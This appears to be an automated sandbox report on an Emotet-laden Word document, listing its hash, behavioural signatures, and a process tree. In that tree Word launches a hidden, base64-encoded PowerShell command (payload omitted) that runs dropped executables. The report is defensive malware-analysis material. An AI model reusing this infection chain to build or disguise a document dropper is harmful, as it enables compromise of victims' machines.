Analysis

  • max time kernel
    151s
  • resource
    win7v191014
  • submitted
    10-12-2019 18:05

General

  • Target

    Docs_ce0dbbcefdbfa0023395b5e11e31d2a2.63.doc

  • Sample

    191210-tre1ht8l26

  • SHA256

    ad99c5c6a1b25fb1aa7e3803d11623a74abb080990d3dfe1e684397b77b019af

Score
10/10

Malware Config

Extracted

Language
ps1
Source
URLs

Extracted

Family

emotet

C2


rsa_pubkey.plain

Signatures

  • Suspicious use of SetWindowsHookEx 6 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of WriteProcessMemory 3 IoCs
  • Emotet

    Emotet is a trojan that is primarily spread through spam emails

  • Modifies registry class 136 IoCs
  • Drops file in System32 directory 6 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Executes dropped EXE 4 IoCs
  • Suspicious behavior: EmotetMutantsSpam 2 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\Docs_ce0dbbcefdbfa0023395b5e11e31d2a2.63.doc"
    1⤵
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of FindShellTrayWindow
    • Drops file in System32 directory
    • Suspicious behavior: AddClipboardFormatListener
    PID:1120
  • C:\Windows\System32\WindowsPowerShell\v1.0\Powershell.exe
    Powershell -w hidden -en [base64-encoded command omitted]
    1⤵
    • Suspicious use of WriteProcessMemory
    • Drops file in System32 directory
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious behavior: EnumeratesProcesses
    PID:2004
    • C:\Users\Admin\162.exe
      "C:\Users\Admin\162.exe"
      2⤵
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      • Executes dropped EXE
      PID:2024
      • C:\Users\Admin\162.exe
        --fb74438b
        3⤵
        • Suspicious use of SetWindowsHookEx
        • Drops file in System32 directory
        • Executes dropped EXE
        • Suspicious behavior: EmotetMutantsSpam
        PID:1156
  • C:\Windows\system32\conhost.exe
    \??\C:\Windows\system32\conhost.exe "-2597591398348209951629390757-20837680671281542962-272171816-1368649592-2099165143"
    1⤵
    • Suspicious use of SetWindowsHookEx
    PID:1984
  • C:\Windows\System32\svchost.exe
    C:\Windows\System32\svchost.exe -k WerSvcGroup
    1⤵
    PID:1288
  • C:\Program Files\Common Files\Microsoft Shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE
    "C:\Program Files\Common Files\Microsoft Shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE"
    1⤵
    PID:640
  • C:\Windows\SysWOW64\chunkerfill.exe
    "C:\Windows\SysWOW64\chunkerfill.exe"
    1⤵
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    • Executes dropped EXE
    PID:1856
    • C:\Windows\SysWOW64\chunkerfill.exe
      --387a37f3
      2⤵
      • Suspicious use of SetWindowsHookEx
      • Drops file in System32 directory
      • Suspicious behavior: EnumeratesProcesses
      • Executes dropped EXE
      • Suspicious behavior: EmotetMutantsSpam
      PID:1548

Network

MITRE ATT&CK Enterprise v6

Downloads

  • memory/1120-0-0x0000000006050000-0x0000000006054000-memory.dmp (Filesize 16KB)
  • memory/1120-1-0x00000000062C0000-0x00000000062C3000-memory.dmp (Filesize 12KB)
  • memory/1120-2-0x00000000062B9000-0x00000000062BD000-memory.dmp (Filesize 16KB)
  • memory/1120-3-0x0000000008FA0000-0x0000000008FA4000-memory.dmp (Filesize 16KB)
  • memory/1120-4-0x000000000626F000-0x0000000006273000-memory.dmp (Filesize 16KB)
  • memory/1120-5-0x000000000626F000-0x0000000006273000-memory.dmp (Filesize 16KB)
  • memory/1120-6-0x000000000626F000-0x0000000006273000-memory.dmp (Filesize 16KB)
  • memory/1156-12-0x0000000000400000-0x000000000047C000-memory.dmp (Filesize 496KB)
  • memory/1156-11-0x00000000001D0000-0x00000000001E7000-memory.dmp (Filesize 92KB)
  • memory/1548-17-0x0000000000400000-0x000000000047C000-memory.dmp (Filesize 496KB)
  • memory/1856-14-0x0000000000350000-0x0000000000367000-memory.dmp (Filesize 92KB)
  • memory/2024-8-0x00000000002D0000-0x00000000002E7000-memory.dmp (Filesize 92KB)